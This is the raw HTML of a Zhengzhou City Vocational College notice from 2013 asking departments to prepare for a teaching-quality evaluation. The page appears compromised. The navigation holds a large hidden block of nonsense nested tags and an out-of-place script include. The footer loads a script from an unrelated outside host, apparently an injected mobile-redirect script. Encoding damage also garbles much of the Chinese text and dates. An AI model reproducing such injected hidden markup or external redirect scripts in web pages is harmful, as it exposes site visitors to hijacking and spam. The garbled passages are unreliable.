cu 关于下发《人才培养工作评估指标体系任务分解书(草案)》及评估学习文件的通知-郑州城市职业学院-评估办公定/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><pre id='ehv1r'><dl id='ehv1r'></dl></pre><strike id='ehv1r'></strike><p id='ehv1r'><legend id='ehv1r'></legend><noframes id='ehv1r'><small id='ehv1r'></small><noframes id='ehv1r'></noframes></noframes></p><style id='ehv1r'><q id='ehv1r'></q></style><big id='ehv1r'></big><form id='ehv1r'></form><blockquote id='ehv1r'><ul id='ehv1r'><span id='ehv1r'><b id='ehv1r'><ol id='ehv1r'><big id='ehv1r'><span id='ehv1r'></span></big></ol><small id='ehv1r'></small><ol id='ehv1r'><ul id='ehv1r'><tbody id='ehv1r'><fieldset id='ehv1r'><strong id='ehv1r'><li id='ehv1r'><bdo id='ehv1r'><abbr id='ehv1r'></abbr></bdo><span id='ehv1r'></span></li></strong></fieldset></tbody></ul></ol><legend id='ehv1r'><noframes id='ehv1r'><tbody id='ehv1r'></tbody></noframes></legend></b><strong id='ehv1r'></strong></span></ul></blockquote><center id='ehv1r'><small id='ehv1r'><ins id='ehv1r'><td id='ehv1r'><div id='ehv1r'></div></td></ins></small></center><del id='ehv1r'><p id='ehv1r'></p><noscript id='ehv1r'><small id='ehv1r'><b id='ehv1r'></b><style id='ehv1r'></style><i id='ehv1r'></i><small id='ehv1r'><dl id='ehv1r'></dl><fieldset id='ehv1r'><form id='ehv1r'><dt id='ehv1r'><code id='ehv1r'></code><code id='ehv1r'><div id='ehv1r'></div></code></dt></form></fieldset></small></small><thead id='ehv1r'><kbd id='ehv1r'></kbd><sup id='ehv1r'><th id='ehv1r'></th></sup></thead><sup id='ehv1r'><strong id='ehv1r'><i id='ehv1r'></i></strong><small id='ehv1r'><div id='ehv1r'></div></small><ins id='ehv1r'></ins></sup><legend id='ehv1r'><table id='ehv1r'></table></legend></noscript></del><li id='ehv1r'><optgroup id='ehv1r'></optgroup></li><label id='ehv1r'></label><label id='ehv1r'></label><sub id='ehv1r'></sub><del id='ehv1r'></del><em id='ehv1r'><dd id='ehv1r'></dd></em><small id='ehv1r'></small><optgroup id='ehv1r'><dfn id='ehv1r'></dfn></optgroup><option id='ehv1r'><tr id='ehv1r'><code id='ehv1r'></code></tr></option><fieldset id='ehv1r'></fieldset><strong id='ehv1r'></strong><noframes id='ehv1r'><tfoot id='ehv1r'></tfoot></noframes><q id='ehv1r'><code id='ehv1r'><select id='ehv1r'></select></code></q><fieldset id='ehv1r'><big id='ehv1r'><tt id='ehv1r'></tt></big><p id='ehv1r'></p></fieldset><li id='ehv1r'></li><li id='ehv1r'></li><tfoot id='ehv1r'></tfoot><small id='ehv1r'></small><ul id='ehv1r'></ul><option id='ehv1r'></option><pre id='ehv1r'><ins id='ehv1r'></ins></pre><select id='ehv1r'></select><ins id='ehv1r'><td id='ehv1r'><i id='ehv1r'></i></td><u id='ehv1r'><code id='ehv1r'><thead id='ehv1r'><button id='ehv1r'><thead id='ehv1r'><option id='ehv1r'></option></thead></button></thead></code><fieldset id='ehv1r'><em id='ehv1r'><big id='ehv1r'></big></em></fieldset></u></ins><sup id='ehv1r'><strong id='ehv1r'></strong><del id='ehv1r'></del></sup><label id='ehv1r'></label><q id='ehv1r'><b id='ehv1r'><acronym id='ehv1r'></acronym><div id='ehv1r'><button id='ehv1r'><table id='ehv1r'></table><sup id='ehv1r'><dd id='ehv1r'><tfoot id='ehv1r'></tfoot></dd><blockquote id='ehv1r'><noframes id='ehv1r'></noframes></blockquote></sup></button></div></b><div id='ehv1r'><ul id='ehv1r'><li id='ehv1r'></li></ul></div></q><tfoot id='ehv1r'><font id='ehv1r'><i id='ehv1r'><dd id='ehv1r'></dd></i></font></tfoot><tr id='ehv1r'><optgroup id='ehv1r'></optgroup></tr><address id='ehv1r'><tfoot id='ehv1r'></tfoot><dd id='ehv1r'></dd></address><option id='ehv1r'><abbr id='ehv1r'><style id='ehv1r'></style><tt id='ehv1r'></tt><font id='ehv1r'></font><u id='ehv1r'><tt id='ehv1r'></tt></u></abbr></option><dd id='ehv1r'><ol id='ehv1r'></ol></dd><bdo id='ehv1r'><acronym id='ehv1r'><pre id='ehv1r'></pre></acronym><b id='ehv1r'><span id='ehv1r'></span></b><form id='ehv1r'></form></bdo><dl id='ehv1r'></dl><thead id='ehv1r'></thead><tt id='ehv1r'><tt id='ehv1r'></tt><sub id='ehv1r'><i id='ehv1r'><dt id='ehv1r'></dt><p id='ehv1r'></p></i></sub></tt><acronym id='ehv1r'><dd id='ehv1r'></dd></acronym><small id='ehv1r'><acronym id='ehv1r'><i id='ehv1r'><label id='ehv1r'><kbd id='ehv1r'><form id='ehv1r'><div id='ehv1r'><strike id='ehv1r'></strike></div></form></kbd></label></i></acronym><bdo id='ehv1r'></bdo><strike id='ehv1r'><table id='ehv1r'></table></strike></small><strike id='ehv1r'></strike><abbr id='ehv1r'></abbr><tbody id='ehv1r'></tbody><sup id='ehv1r'></sup><code id='ehv1r'><ul id='ehv1r'><tfoot id='ehv1r'></tfoot></ul></code><bdo id='ehv1r'></bdo><tr id='ehv1r'></tr><sup id='ehv1r'></sup><abbr id='ehv1r'></abbr><dfn id='ehv1r'><dir id='ehv1r'><p id='ehv1r'></p></dir><small id='ehv1r'><div id='ehv1r'></div></small></dfn><th id='ehv1r'><noscript id='ehv1r'></noscript></th><address id='ehv1r'><abbr id='ehv1r'></abbr><big id='ehv1r'></big></address><ol id='ehv1r'><dd id='ehv1r'><address id='ehv1r'></address></dd></ol><sub id='ehv1r'><optgroup id='ehv1r'></optgroup><thead id='ehv1r'></thead></sub><th id='ehv1r'><del id='ehv1r'></del></th><dd id='ehv1r'><small id='ehv1r'></small></dd><option id='ehv1r'><thead id='ehv1r'></thead></option><blockquote id='ehv1r'></blockquote><option id='ehv1r'></option><noframes id='ehv1r'><legend id='ehv1r'><style id='ehv1r'><dir id='ehv1r'><q id='ehv1r'></q></dir></style></legend></noframes><u id='ehv1r'></u><table id='ehv1r'><table id='ehv1r'><dir id='ehv1r'><thead id='ehv1r'><dl id='ehv1r'><td id='ehv1r'></td></dl></thead></dir><noframes id='ehv1r'><i id='ehv1r'><tr id='ehv1r'><dt id='ehv1r'><q id='ehv1r'><span id='ehv1r'><b id='ehv1r'><form id='ehv1r'><ins id='ehv1r'></ins><ul id='ehv1r'></ul><sub id='ehv1r'></sub></form><legend id='ehv1r'></legend><bdo id='ehv1r'><pre id='ehv1r'><center id='ehv1r'></center></pre></bdo></b><th id='ehv1r'></th></span></q></dt></tr></i></noframes><em id='ehv1r'><optgroup id='ehv1r'><dfn id='ehv1r'><del id='ehv1r'><code id='ehv1r'></code></del></dfn></optgroup></em><noframes id='ehv1r'><div id='ehv1r'><tfoot id='ehv1r'></tfoot><dl id='ehv1r'><fieldset id='ehv1r'></fieldset></dl></div></noframes><label id='ehv1r'></label></table><tfoot id='ehv1r'></tfoot></table><span id='ehv1r'></span><dfn id='ehv1r'></dfn><tr id='ehv1r'></tr><th id='ehv1r'><tt id='ehv1r'></tt><dd id='ehv1r'></dd></th><optgroup id='ehv1r'></optgroup><blockquote id='ehv1r'></blockquote><center id='ehv1r'></center><em id='ehv1r'><kbd id='ehv1r'></kbd><li id='ehv1r'><span id='ehv1r'></span></li><pre id='ehv1r'></pre></em><ol id='ehv1r'><tt id='ehv1r'><label id='ehv1r'><kbd id='ehv1r'></kbd></label></tt></ol><sub id='ehv1r'><sup id='ehv1r'><dl id='ehv1r'></dl><td id='ehv1r'></td><tt id='ehv1r'><blockquote id='ehv1r'><big id='ehv1r'><ol id='ehv1r'><tt id='ehv1r'><code id='ehv1r'><p id='ehv1r'></p><small id='ehv1r'><li id='ehv1r'></li><button id='ehv1r'><tfoot id='ehv1r'><i id='ehv1r'></i></tfoot></button><tbody id='ehv1r'><em id='ehv1r'></em></tbody></small></code></tt></ol></big><q id='ehv1r'><i id='ehv1r'><span id='ehv1r'></span><dt id='ehv1r'><ol id='ehv1r'></ol><b id='ehv1r'></b><strike id='ehv1r'><dir id='ehv1r'></dir></strike></dt><legend id='ehv1r'></legend><tr id='ehv1r'><optgroup id='ehv1r'><label id='ehv1r'><select id='ehv1r'><tt id='ehv1r'><blockquote id='ehv1r'></blockquote></tt></select></label></optgroup></tr><b id='ehv1r'></b></i><dfn id='ehv1r'></dfn></q></blockquote></tt></sup></sub><option id='ehv1r'></option><td id='ehv1r'><big id='ehv1r'><tfoot id='ehv1r'></tfoot></big><strong id='ehv1r'></strong></td><tfoot id='ehv1r'></tfoot><tfoot id='ehv1r'><pre id='ehv1r'><acronym id='ehv1r'><table id='ehv1r'><dir id='ehv1r'></dir></table></acronym></pre></tfoot><tt id='ehv1r'></tt><strong id='ehv1r'><u id='ehv1r'><div id='ehv1r'><div id='ehv1r'><q id='ehv1r'></q></div><strong id='ehv1r'><dt id='ehv1r'><sub id='ehv1r'><li id='ehv1r'></li></sub></dt></strong></div></u></strong><big id='ehv1r'></big><th id='ehv1r'></th><dd id='ehv1r'><center id='ehv1r'></center></dd><td id='ehv1r'></td><ol id='ehv1r'><dd id='ehv1r'><th id='ehv1r'></th></dd></ol><dt id='ehv1r'><div id='ehv1r'><abbr id='ehv1r'><strike id='ehv1r'></strike></abbr></div></dt><center id='ehv1r'></center><center id='ehv1r'></center><bdo id='ehv1r'><dd id='ehv1r'><abbr id='ehv1r'><strike id='ehv1r'></strike><ul id='ehv1r'><del id='ehv1r'><q id='ehv1r'><tbody id='ehv1r'><noframes id='ehv1r'><bdo id='ehv1r'></bdo><ul id='ehv1r'></ul></noframes></tbody></q></del></ul><big id='ehv1r'><big id='ehv1r'><dt id='ehv1r'><acronym id='ehv1r'></acronym><q id='ehv1r'><select id='ehv1r'><center id='ehv1r'><dir id='ehv1r'></dir></center></select><noscript id='ehv1r'><strong id='ehv1r'><tr id='ehv1r'></tr></strong><label id='ehv1r'></label><strike id='ehv1r'></strike><option id='ehv1r'><u id='ehv1r'><ol id='ehv1r'><blockquote id='ehv1r'></blockquote></ol></u></option><table id='ehv1r'></table></noscript><i id='ehv1r'><abbr id='ehv1r'></abbr></i><thead id='ehv1r'><strong id='ehv1r'><b id='ehv1r'></b></strong></thead></q></dt></big></big></abbr></dd><acronym id='ehv1r'></acronym><sub id='ehv1r'></sub><optgroup id='ehv1r'><del id='ehv1r'><optgroup id='ehv1r'></optgroup></del><button id='ehv1r'></button></optgroup><ul id='ehv1r'><em id='ehv1r'></em><dir id='ehv1r'><td id='ehv1r'></td><address id='ehv1r'></address><td id='ehv1r'></td><thead id='ehv1r'><thead id='ehv1r'></thead><ul id='ehv1r'></ul></thead></dir><del id='ehv1r'></del><thead id='ehv1r'></thead></ul><acronym id='ehv1r'></acronym></bdo><legend id='ehv1r'><font id='ehv1r'><font id='ehv1r'><span id='ehv1r'><tr id='ehv1r'><option id='ehv1r'></option></tr></span></font></font></legend><tbody id='ehv1r'><b id='ehv1r'><select id='ehv1r'></select></b></tbody><div id='ehv1r'><form id='ehv1r'></form><fieldset id='ehv1r'><pre id='ehv1r'><kbd id='ehv1r'><u id='ehv1r'><form id='ehv1r'><li id='ehv1r'><th id='ehv1r'><dt id='ehv1r'></dt></th></li><span id='ehv1r'></span></form><address id='ehv1r'></address></u><u id='ehv1r'><tt id='ehv1r'></tt></u></kbd></pre><p id='ehv1r'></p></fieldset></div><tbody id='ehv1r'><blockquote id='ehv1r'><style id='ehv1r'></style></blockquote><u id='ehv1r'></u></tbody><fieldset id='ehv1r'></fieldset><form id='ehv1r'></form><li id='ehv1r'><abbr id='ehv1r'></abbr></li><acronym id='ehv1r'></acronym><tt id='ehv1r'><dl id='ehv1r'></dl></tt><fieldset id='ehv1r'></fieldset><em id='ehv1r'></em><b id='ehv1r'></b><p id='ehv1r'></p><tbody id='ehv1r'><address id='ehv1r'></address><dd id='ehv1r'></dd></tbody><dir id='ehv1r'></dir><tbody id='ehv1r'></tbody><ul id='ehv1r'><select id='ehv1r'></select></ul><td id='ehv1r'></td><kbd id='ehv1r'><tt id='ehv1r'><q id='ehv1r'></q></tt></kbd><tfoot id='ehv1r'><select id='ehv1r'><abbr id='ehv1r'></abbr><table id='ehv1r'></table></select></tfoot><em id='ehv1r'><optgroup id='ehv1r'><label id='ehv1r'></label><ol id='ehv1r'><dir id='ehv1r'><label id='ehv1r'></label><form id='ehv1r'><thead id='ehv1r'><tbody id='ehv1r'></tbody></thead></form></dir><table id='ehv1r'><form id='ehv1r'><table id='ehv1r'><legend id='ehv1r'><li id='ehv1r'></li><big id='ehv1r'><span id='ehv1r'><optgroup id='ehv1r'><span id='ehv1r'></span></optgroup></span></big></legend><noscript id='ehv1r'></noscript><div id='ehv1r'><code id='ehv1r'><sup id='ehv1r'><kbd id='ehv1r'></kbd></sup><thead id='ehv1r'><small id='ehv1r'></small></thead></code></div><dt id='ehv1r'></dt></table></form></table><abbr id='ehv1r'><small id='ehv1r'></small></abbr></ol></optgroup><abbr id='ehv1r'><optgroup id='ehv1r'></optgroup></abbr><sup id='ehv1r'></sup><abbr id='ehv1r'><style id='ehv1r'><strike id='ehv1r'><b id='ehv1r'><i id='ehv1r'></i></b></strike></style></abbr></em><table id='ehv1r'></table><dl id='ehv1r'></dl><strike id='ehv1r'></strike><tt id='ehv1r'><p id='ehv1r'></p></tt><div id='ehv1r'><noscript id='ehv1r'></noscript><dt id='ehv1r'><bdo id='ehv1r'><strong id='ehv1r'><sup id='ehv1r'><acronym id='ehv1r'></acronym></sup></strong></bdo><blockquote id='ehv1r'><tbody id='ehv1r'></tbody><tbody id='ehv1r'><dl id='ehv1r'></dl><del id='ehv1r'></del><ins id='ehv1r'><dfn id='ehv1r'><button id='ehv1r'></button></dfn></ins><td id='ehv1r'></td><option id='ehv1r'></option><tbody id='ehv1r'><sub id='ehv1r'><acronym id='ehv1r'><font id='ehv1r'><ins id='ehv1r'></ins></font><tr id='ehv1r'></tr></acronym></sub></tbody><dir id='ehv1r'></dir><address id='ehv1r'><bdo id='ehv1r'></bdo></address></tbody></blockquote><form id='ehv1r'><q id='ehv1r'><dd id='ehv1r'><fieldset id='ehv1r'></fieldset></dd></q></form><ol id='ehv1r'></ol><tfoot id='ehv1r'></tfoot></dt></div><pre id='ehv1r'><tt id='ehv1r'></tt><noframes id='ehv1r'></noframes></pre><dir id='ehv1r'><tt id='ehv1r'><q id='ehv1r'></q><select id='ehv1r'><dir id='ehv1r'></dir><ins id='ehv1r'><li id='ehv1r'></li></ins><small id='ehv1r'><ul id='ehv1r'></ul></small><pre id='ehv1r'></pre></select></tt><ul id='ehv1r'></ul></dir><th id='ehv1r'></th><ol id='ehv1r'><sup id='ehv1r'><i id='ehv1r'><pre id='ehv1r'><table id='ehv1r'></table></pre></i></sup></ol><option id='ehv1r'></option><dt id='ehv1r'></dt><sup id='ehv1r'></sup><big id='ehv1r'></big><thead id='ehv1r'></thead><p id='ehv1r'></p><td id='ehv1r'><acronym id='ehv1r'><div id='ehv1r'><tt id='ehv1r'></tt></div><fieldset id='ehv1r'></fieldset><bdo id='ehv1r'></bdo><em id='ehv1r'><font id='ehv1r'></font></em></acronym></td><dir id='ehv1r'></dir><u id='ehv1r'></u><strong id='ehv1r'><td id='ehv1r'></td></strong><tt id='ehv1r'></tt><q id='ehv1r'><legend id='ehv1r'><bdo id='ehv1r'><bdo id='ehv1r'><legend id='ehv1r'><b id='ehv1r'><strong id='ehv1r'><label id='ehv1r'><sup id='ehv1r'><u id='ehv1r'><sup id='ehv1r'></sup></u><big id='ehv1r'></big><select id='ehv1r'></select></sup><p id='ehv1r'></p></label></strong></b></legend></bdo><noscript id='ehv1r'></noscript><dt id='ehv1r'></dt></bdo></legend></q><small id='ehv1r'></small><b id='ehv1r'></b><li id='ehv1r'><p id='ehv1r'><label id='ehv1r'><table id='ehv1r'><sup id='ehv1r'><em id='ehv1r'></em></sup></table><blockquote id='ehv1r'></blockquote></label></p></li><blockquote id='ehv1r'></blockquote><dd id='ehv1r'><thead id='ehv1r'></thead><abbr id='ehv1r'><noscript id='ehv1r'><tbody id='ehv1r'><style id='ehv1r'><sup id='ehv1r'></sup></style></tbody></noscript></abbr></dd></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置?a href="/pgw/">首页</a> > 最新公> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公定/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动急/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简L/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>最新公/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>关于下发《人才培养工作评估指标体系任务分解书(草案)》及评估学习文件的通知</h1> <div class="info">发布时间?0132pt2日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=902"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="font-size: 14pt; font-family: 仿宋_GB2312">各处室、系部:<span lang="EN-US"><o:p></o:p></span></span></p> <p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span lang="EN-US" style="font-size: 14pt; font-family: 仿宋_GB2312"><span style="mso-spacerun: yes">    </span></span><span style="font-size: 14pt; font-family: 仿宋_GB2312">根据河南省教育厅评估工作要求,每所新建高职院校在有一届毕业生至三届毕业生前必须参加评估,经院长办公会研究决定,从现在开始着手评估的准备工作。为了迎接高职评估,评估办依据《河南省高等职业院校人才培养工作评估指标体系》制订了《郑州城市职业学院人才培养工作评估指标体系任务分解书(草案)》(详见附件)Gspan lang="EN-US">12</span>末@span lang="EN-US">10</span>日,学院召开了评估工作专题会议,组织学习了《高等职业院校人才培养工作评估方案学习与任务分解讲解》。请各部门领导认真组织本部门员工学习、领会有关评估文件的精神和内涵,根据评估任务分解书的相关任务和具体要求,对本部门<span lang="EN-US">2012-2013</span>学年及本学期相关材料及时进行梳理、归档,弄清楚本部门需要准备的材料有哪些,目前已有的材料有哪些,下一步需要补充和完善的材料有哪些,做到心中有数,为学院评估工作的全面启动做好前期准备Gspan lang="EN-US"><o:p></o:p></span></span></p> <p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span lang="EN-US" style="font-size: 14pt; font-family: 仿宋_GB2312"><o:p> </o:p></span></p> <p align="right" class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 315pt; mso-char-indent-count: 22.5"><span style="font-size: 14pt; font-family: 仿宋_GB2312">                                                                                                                                                        评估办公定span lang="EN-US"><o:p></o:p></span></span></p> <p align="right" class="MsoNormal" style="margin: 0cm 0cm 0pt; text-indent: 294pt; mso-char-indent-count: 21.0"><span lang="EN-US" style="font-size: 14pt; font-family: 仿宋_GB2312">                                 2013</span><span style="font-size: 14pt; font-family: 仿宋_GB2312">幥span lang="EN-US">12</span>末@span lang="EN-US">12</span>Lspan lang="EN-US"><o:p></o:p></span></span></p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编?52370 电话?371-69213333 <br> 豫ICP夣S2014925另R </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>